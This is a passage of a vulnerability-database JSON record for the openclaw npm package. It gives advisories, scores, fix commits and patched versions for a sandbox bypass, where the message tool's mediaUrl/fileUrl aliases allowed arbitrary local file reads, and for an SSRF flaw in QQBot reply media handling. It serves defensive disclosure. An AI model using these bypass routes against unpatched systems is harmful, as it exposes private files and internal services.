/VA:N/SC:H/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerabili
ty":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43533","GHSA-66r7-m7xm-v49h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9hcd-uj62-8yeu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90860?format=json","vulnerability_id":"VCID-9jjv-aa8k-rke1","summary":"OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n## Summary\n\nThe message tool accepted `mediaUrl` and `fileUrl` aliases without applying the same sandbox localRoots validation as the canonical media path handling.\n\n## Impact\n\nA caller constrained to sandbox media roots could read arbitrary local files by routing them through the alias parameters.\n\n## Affected Component\n\n`src/infra/outbound/message-action-params.ts, src/infra/outbound/message-action-runner.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.24`\n- Patched: `>= 2026.3.24`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `1d7cb6fc03` (`fix: close sandbox media root bypass for mediaUrl/fileUrl aliases`).\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33581","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17246","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17243","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19689","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33581"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":
"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters"},{"reference_url":"https://github.com/advisories/GHSA-v8wv-
jg3q-qwpq","reference_id":"GHSA-v8wv-jg3q-qwpq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v8wv-jg3q-qwpq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerabi
lity":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerabi
lity":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerabi
lity":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerabi
lity":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-33581","GHSA-v8wv-jg3q-qwpq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9jjv-aa8k-rke1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89809?format=json","vulnerability_id":"VCID-9kgh-wj9w-ykff","summary":"OpenClaw: QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes\n## Summary\n\nQQBot reply media URL handling could trigger SSRF and re-upload fetched bytes.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nQQBot reply media URLs could be treated as trusted media sources, allowing SSRF fetches whose returned bytes were then re-uploaded through the channel.\n\n## Technical Details\n\nThe fix routes QQBot remote media fetches through SSRF-guarded media fetching and explicit URL allowlist policy.\n\n## Fix\n\nThe issue was fixed in #63495 and #65788. 
The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a`\n- `ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d`\n- PR: #63495, #65788\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @threalwinky for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43526","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12834","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14131","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14168","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43526"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d9516
9b171a6c"},{"reference_url":"https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63495","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE"
,"scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63495"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65788","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65788"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43526","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43526"},{"reference_url":"https://www.vulncheck.
com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling"},{"reference_url":"https://github.com/advisories/GHSA-2767-2q9v-9326","reference_id":"GHSA-2767-2q9v-9326","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv